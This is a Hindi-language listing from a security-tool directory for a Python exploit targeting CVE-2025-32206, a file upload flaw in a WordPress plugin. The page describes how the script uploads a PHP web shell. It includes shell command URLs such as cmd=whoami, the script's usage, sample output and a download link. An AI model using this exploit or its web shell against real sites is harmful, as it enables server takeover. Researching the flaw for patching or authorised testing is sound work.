Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32206 — WordPress Processing Projects Plugin <= 1.0.2 Arbitrary File Upload भेद्यता के प्रति संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-32206
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubnxploited/cve-2025-32206

CVE-2025-32206

WordPress Processing Projects Plugin <= 1.0.2 Arbitrary File Upload भेद्यता के प्रति संवेदनशील है।

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32206 - वर्डप्रेस प्रोसेसिंग प्रोजेक्ट्स <= 1.0.2 मनमाना फ़ाइल अपलोड एक्सप्लॉइट

CVE-2025-32206 Banner


🔍 CVE जानकारी

  • CVE ID: CVE-2025-32206
  • भेद्यता प्रकार: अप्रतिबंधित फ़ाइल अपलोड (वेब शेल अपलोड)
  • प्रभावित प्लगइन: प्रोसेसिंग प्रोजेक्ट्स वर्डप्रेस प्लगइन
  • प्रभावित संस्करण: अज्ञात (n/a) से 1.0.2 तक
  • CVSS स्कोर: 9.1 (गंभीर)
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

"LABCAT प्रोसेसिंग प्रोजेक्ट्स में खतरनाक प्रकार की फ़ाइल का अप्रतिबंधित अपलोड भेद्यता हमलावरों को वेब सर्वर पर वेब शेल अपलोड करने की अनुमति देती है। इससे पूर्ण समझौता (full compromise) हो सकता है।"


🧑‍💻 एक्सप्लॉइट विवरण

यह Python एक्सप्लॉइट स्क्रिप्ट उन वर्डप्रेस साइटों को लक्षित करती है जो भेद्य प्रोसेसिंग प्रोजेक्ट्स प्लगइन (संस्करण <= 1.0.2) का उपयोग करती हैं। यह प्लगइन प्रमाणित उपयोगकर्ताओं से फ़ाइल अपलोड को अनुचित तरीके से संभालता है, जिससे वे मनमानी ZIP फ़ाइलें अपलोड कर सकते हैं जिनमें निष्पादन योग्य PHP कोड (वेब शेल) शामिल होते हैं।

एक्सप्लॉइट स्क्रिप्ट:

  1. लक्षित वर्डप्रेस साइट पर व्यवस्थापक के रूप में प्रमाणीकरण करती है।
  2. भेद्य एंडपॉइंट पर नेविगेट करती है और nonce फ़ील्ड को स्वचालित रूप से निकालती है।
  3. एक दुर्भावनापूर्ण PHP शेल (Nxploit.php) युक्त एक ZIP फ़ाइल (Nxploited.zip) बनाती है।
  4. वर्डप्रेस व्यवस्थापक व्यवहार की नकल करते हुए POST अनुरोध के माध्यम से फ़ाइल अपलोड करती है।
  5. जाँचती है कि शेल निम्न पर सुलभ है या नहीं:
    • http://target.com/wp-content/uploads/processing-projects/Nxploit.php

🐚 शेल उपयोग

शेल सफलतापूर्वक अपलोड हो जाने के बाद, इसका उपयोग cmd पैरामीटर के माध्यम से सिस्टम कमांड निष्पादित करने के लिए किया जा सकता है। उदाहरण:

root@kitploit:~
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls

यह शेल मनमाने OS कमांड निष्पादित करता है और उनका आउटपुट सीधे प्रतिक्रिया में लौटाता है।


🚀 उपयोग

root@kitploit:~
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g. http://target.com/wordpress)
  -un, --username USERNAME     WordPress admin username
  -p, --password PASSWORD      WordPress admin password

📄 नमूना आउटपुट

root@kitploit:~

[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi

[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। उन सिस्टमों पर इस एक्सप्लॉइट का अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।

हमेशा जिम्मेदार प्रकटीकरण (responsible disclosure) प्रथाओं का पालन करें और इस उपकरण का उपयोग केवल नियंत्रित वातावरण में या स्पष्ट प्राधिकरण के साथ करें।


द्वारा : Nxploited | Khaled Alenazi

टूल डाउनलोड करें